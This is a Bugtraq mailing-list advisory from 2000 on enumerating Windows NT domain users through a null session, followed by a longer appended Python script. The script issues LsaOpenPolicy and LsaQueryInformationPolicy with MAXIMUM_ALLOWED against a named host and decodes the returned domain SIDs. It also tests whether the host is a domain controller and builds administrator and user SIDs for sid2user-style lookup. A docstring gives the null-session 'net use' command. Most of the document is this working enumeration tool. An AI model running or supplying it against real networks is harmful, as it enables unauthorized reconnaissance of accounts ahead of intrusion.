Bugtraq mailing list archives

Windows NT and account list leak ! A new SID usage


From: longprep () HOTMAIL COM (Pascal Longpre)
Date: Tue, 1 Feb 2000 02:57:24 -0000


This may not be new but I haven't seen it anywhere else so 
here it is.

- Description -
It is possible to list the whole user list of a domain by 
querying any workstation on that domain. Even if the domain 
controller is hidden behind a firewall or has IP filtering 
enabled, the list comes out gracefully since the 
workstation forwards the query for you.
I suspect that this may even work on a workstation 
connected to its DC through a VPN but I haven't tested it 
yet.

- Explanations -
The idea is to get the workstation to spit out its domain SID 
with the LsaQueryInformationPolicy() function. Normally, 
that function would require the "GENERIC_READ | 
GENERIC_EXECUTE" access rights in order to work, but I 
discovered that by simply using the "MAXIMUM_ALLOWED" 
access right it works through the good old null session.

- Exploitation -
I wrote a small program called "dom2sid" demonstrating 
this. It should be available shortly on the securityfocus 
free tools list. It returns the computer/domain names and 
SIDs. You can then feed this to the popular sid2user tool 
and get the whole user list. If both SIDs are equal, you 
found a DC.

- Fix - 
The "restrict anonymous" solution provided by Microsoft 
doesn't help here. The only way I was able to stop this 
behavior was to use a program called fixpol.exe. Don't ask 
me where I found that one, I don't remember...

Enjoy !!

If this is old stuff, well just forget about this message !!
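The following is an added example and is not the author's dom2sid tool or any code from the post. It shows the pieces a practitioner would want when reproducing the post's procedure: decoding the binary SID blobs that LsaQueryInformationPolicy() hands back into the S-1-5-21-... form sid2user takes, the "account-domain SID equals primary-domain SID, so this is a DC" test, and the domain-SID-plus-RID strings a sid2user-style lookup then resolves. The query_domain_sids() helper issues the LSA calls with MAXIMUM_ALLOWED through ctypes and only runs on Windows; it assumes a null session to the target has already been established with net use. The structure layouts and the constants MAXIMUM_ALLOWED, PolicyPrimaryDomainInformation (3) and PolicyAccountDomainInformation (5) are those of the Win32 SDK; the machine name WKS1, domain name CORP and every SID value in the offline path are constructed for this example.

```python
"""Added example, not the dom2sid tool from the post: decode the binary SIDs that
LsaQueryInformationPolicy() returns, apply the post's "account-domain SID ==
primary-domain SID => domain controller" test, and build the RID-appended SIDs a
sid2user-style lookup would then resolve.  query_domain_sids() issues the real LSA
calls with MAXIMUM_ALLOWED and is Windows-only; SAMPLE_* values are constructed."""
import struct
import sys

MAXIMUM_ALLOWED = 0x02000000            # the access mask the post found works over a null session
POLICY_PRIMARY_DOMAIN_INFORMATION = 3   # POLICY_INFORMATION_CLASS: the NT domain the box is joined to
POLICY_ACCOUNT_DOMAIN_INFORMATION = 5   # POLICY_INFORMATION_CLASS: the box's own local account domain

# Constructed: a workstation's account-domain SID as the PSID blob arrives in memory:
# revision 1, 4 sub-authorities, authority 5 (big-endian), then 21,1111,2222,3333 (little-endian)
SAMPLE_ACCOUNT_SID_BLOB = bytes([1, 4, 0, 0, 0, 0, 0, 5,
                                 0x15, 0, 0, 0, 0x57, 4, 0, 0, 0xAE, 8, 0, 0, 5, 0x0D, 0, 0])
SAMPLE_PRIMARY_DOMAIN_SID = "S-1-5-21-4444-5555-6666"   # constructed: SID of the domain CORP


def sid_to_string(blob):
    """Binary SID -> 'S-1-<authority>-<sub>-...' in the form sid2user expects."""
    if len(blob) < 8 or blob[0] != 1:
        raise ValueError("not a revision-1 SID")
    count = blob[1]
    if len(blob) < 8 + 4 * count:
        raise ValueError("truncated SID: %d sub-authorities need %d bytes" % (count, 8 + 4 * count))
    authority = int.from_bytes(blob[2:8], "big")     # 48-bit and big-endian, unlike the sub-authorities
    subs = struct.unpack("<%dI" % count, blob[8:8 + 4 * count])
    return "S-1-%d" % authority + "".join("-%d" % s for s in subs)


def is_domain_controller(account_domain_sid, primary_domain_sid):
    """dom2sid's test: only on a DC is the machine's own account domain the NT domain itself."""
    return primary_domain_sid is not None and account_domain_sid == primary_domain_sid


def candidate_user_sids(domain_sid, first_rid=1000, count=10):
    """Domain SID + RID = account SID: the strings a sid2user-style LsaLookupSids walk resolves.
    500/501 are the built-in Administrator/Guest RIDs; 512/513 are Domain Admins/Domain Users."""
    rids = [500, 501, 512, 513] + list(range(first_rid, first_rid + count))
    return ["%s-%d" % (domain_sid, rid) for rid in rids]


def query_domain_sids(server):
    """Windows only.  LsaOpenPolicy(MAXIMUM_ALLOWED) + LsaQueryInformationPolicy against SERVER,
    assuming a null session already exists (net use \\\\SERVER\\ipc$ "" /user:"").
    Returns (account_domain_name, account_domain_sid, primary_domain_name, primary_domain_sid)."""
    import ctypes
    from ctypes import wintypes as wt

    class LSA_UNICODE_STRING(ctypes.Structure):
        _fields_ = [("Length", wt.USHORT), ("MaximumLength", wt.USHORT), ("Buffer", ctypes.c_void_p)]

    class LSA_OBJECT_ATTRIBUTES(ctypes.Structure):
        _fields_ = [("Length", wt.ULONG), ("RootDirectory", ctypes.c_void_p), ("ObjectName", ctypes.c_void_p),
                    ("Attributes", wt.ULONG), ("SecurityDescriptor", ctypes.c_void_p),
                    ("SecurityQualityOfService", ctypes.c_void_p)]

    class DOMAIN_INFO(ctypes.Structure):   # POLICY_ACCOUNT_DOMAIN_INFO and POLICY_PRIMARY_DOMAIN_INFO share this layout
        _fields_ = [("Name", LSA_UNICODE_STRING), ("Sid", ctypes.c_void_p)]

    adv = ctypes.WinDLL("advapi32")
    adv.GetLengthSid.argtypes = [ctypes.c_void_p]
    wbuf = ctypes.create_unicode_buffer(server)
    name = LSA_UNICODE_STRING(len(server) * 2, len(server) * 2 + 2, ctypes.addressof(wbuf))
    attrs = LSA_OBJECT_ATTRIBUTES()
    attrs.Length = ctypes.sizeof(attrs)
    policy = ctypes.c_void_p()
    status = adv.LsaOpenPolicy(ctypes.byref(name), ctypes.byref(attrs), MAXIMUM_ALLOWED, ctypes.byref(policy))
    if status != 0:
        raise ctypes.WinError(adv.LsaNtStatusToWinError(status))

    def query(info_class):
        buf = ctypes.c_void_p()
        status = adv.LsaQueryInformationPolicy(policy, info_class, ctypes.byref(buf))
        if status != 0:
            raise ctypes.WinError(adv.LsaNtStatusToWinError(status))
        info = ctypes.cast(buf, ctypes.POINTER(DOMAIN_INFO)).contents
        dom = ctypes.wstring_at(info.Name.Buffer, info.Name.Length // 2) if info.Name.Buffer else None
        sid = sid_to_string(ctypes.string_at(info.Sid, adv.GetLengthSid(info.Sid))) if info.Sid else None
        adv.LsaFreeMemory(buf)     # a standalone box returns no primary-domain SID, hence the None checks
        return dom, sid

    try:
        return query(POLICY_ACCOUNT_DOMAIN_INFORMATION) + query(POLICY_PRIMARY_DOMAIN_INFORMATION)
    finally:
        adv.LsaClose(policy)


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.platform == "win32":
        acct_name, acct_sid, dom_name, dom_sid = query_domain_sids(sys.argv[1])
    else:   # offline: constructed workstation WKS1 joined to the domain CORP
        acct_name, acct_sid = "WKS1", sid_to_string(SAMPLE_ACCOUNT_SID_BLOB)
        dom_name, dom_sid = "CORP", SAMPLE_PRIMARY_DOMAIN_SID
    print("account domain:", acct_name, acct_sid)
    print("primary domain:", dom_name, dom_sid)
    print("domain controller:", is_domain_controller(acct_sid, dom_sid))
    for s in candidate_user_sids(dom_sid):
        print("  feed to sid2user:", s)
```

Run without arguments it walks the constructed SIDs offline; on a Windows host with a null session already opened to the target, passing the target's name issues the two LSA queries the post describes. A standalone (non-domain) machine returns no primary-domain SID, which is why the DC test treats None as "not a DC" rather than comparing it.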

